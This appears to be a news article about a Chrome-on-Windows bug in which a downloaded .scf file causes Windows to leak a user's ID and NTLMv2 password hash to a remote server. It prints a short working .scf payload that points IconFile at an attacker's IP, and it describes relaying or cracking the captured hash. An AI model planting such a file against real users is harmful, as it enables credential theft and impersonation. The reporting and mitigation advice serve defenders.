Chrome on Windows has credential theft bug

.SCF files present ID, password to fetch icons for attack file


Google's Chrome team is working to fix a credential theft bug that strikes if the browser is running on Microsoft Windows.

The bug is exploited if a user is tricked into clicking a link that downloads a Windows .scf file (the ancient Shell Command File format, a shortcut to Show Desktop since Windows 98).

This exploits two things: how Chrome handles .scf files, and how Windows handles them.

Most download links are sanitised by Chrome – for example, as discoverers DefenseCode write, since Stuxnet the browser has forced a .download extension onto Windows LNK files – but not .scf files.

That arrangement means that if the user clicks the link, the malicious .scf file will lie dormant in the /Downloads directory until the next time the user opens the folder.

Here's where the Windows flaw comes in: merely viewing the folder will trigger Windows to try and retrieve an icon associated with the .scf file.

To retrieve the icon, the user's machine will present credentials to a server – their user ID and hashed password on a corporate network, or the home group's credentials if it's a personal machine.

Naturally enough, since this involves credentials, they're available to the attacker.

If the .scf file contains this code:

[Shell]
IconFile=\\170.170.170.170\icon

… then the user ID and hashed password will be presented to the attacker's IP.

Since it's an NTLMv2 hashed password, to recover it would need offline brute-force cracking, but SecureCode points out that user ID and the hash can be presented to other services.

“The remote SMB server set up by the attacker is ready to capture the victim's username and NTLMv2 password hash for offline cracking or relay the connection to an externally available service that accepts the same kind of authentication (e.g. Microsoft Exchange) to impersonate the victim without ever knowing the password” writes Defense Code's Bosko Stankovic [emphasis added].

Password brute-forcing is only moderately difficult, the post says: an NVIDIA GTX 1080 card should manage to recover an eight-character password in less than a day.

While users wait for a fix from Google, Chrome users should get to their Advanced settings, and make Chrome ask where downloaded files are to be saved: that way, the .scf extension will be revealed.

Google told Kaspersky's ThreatPost it's aware of the issue and is working on a fix. ®


Keep Reading

Microsoft drives users to the Edge: Internet Explorer to redirect to Chromium-based browser in November

'Hey, you folks heard that there's this virus starting to spread?' – IE, probably

We've come to wish you an unhappy birthday: Microsoft to yank services from Internet Explorer, kill off Legacy Edge by 2021

You need to give that plate back to us after you've finished your cake. Yes the fork too. We'll get your coat

Microsoft teases Azure Data Explorer connector for picking its Synapse analytics service's brains

What do you mean you're not on board the Big Data bus?

Azure DevOps Services reminds users that, yes, it really is time to pull the plug on Internet Explorer 11

Ignite Sure, it's still wedged in the OS, but maybe you'd prefer something shiny and Chromier?

In a world where up is down, it's heartwarming to know Internet Explorer still tops list of web dev pain points

Incompatibilities and inconsistent standards support among browsers ensure an ongoing source of headaches

Disabled by default: Microsoft ups the ante in its war against VBScript on Internet Explorer

Will the last IE 11 user please turn out the lights?

If you never thought you'd hear a Microsoftie tell you to stop using Internet Explorer, lap it up: 'I beg you, let it retire to great bitbucket in the sky'

We say take off and nuke the entire codebase from orbit. It's the only way to be sure

Microsoft adds Internet Explorer mode to Chromium Edge, announces roadmap

Enterprise features including support for hated ancient browser ready to evaluate

Biting the hand that feeds IT © 1998–2020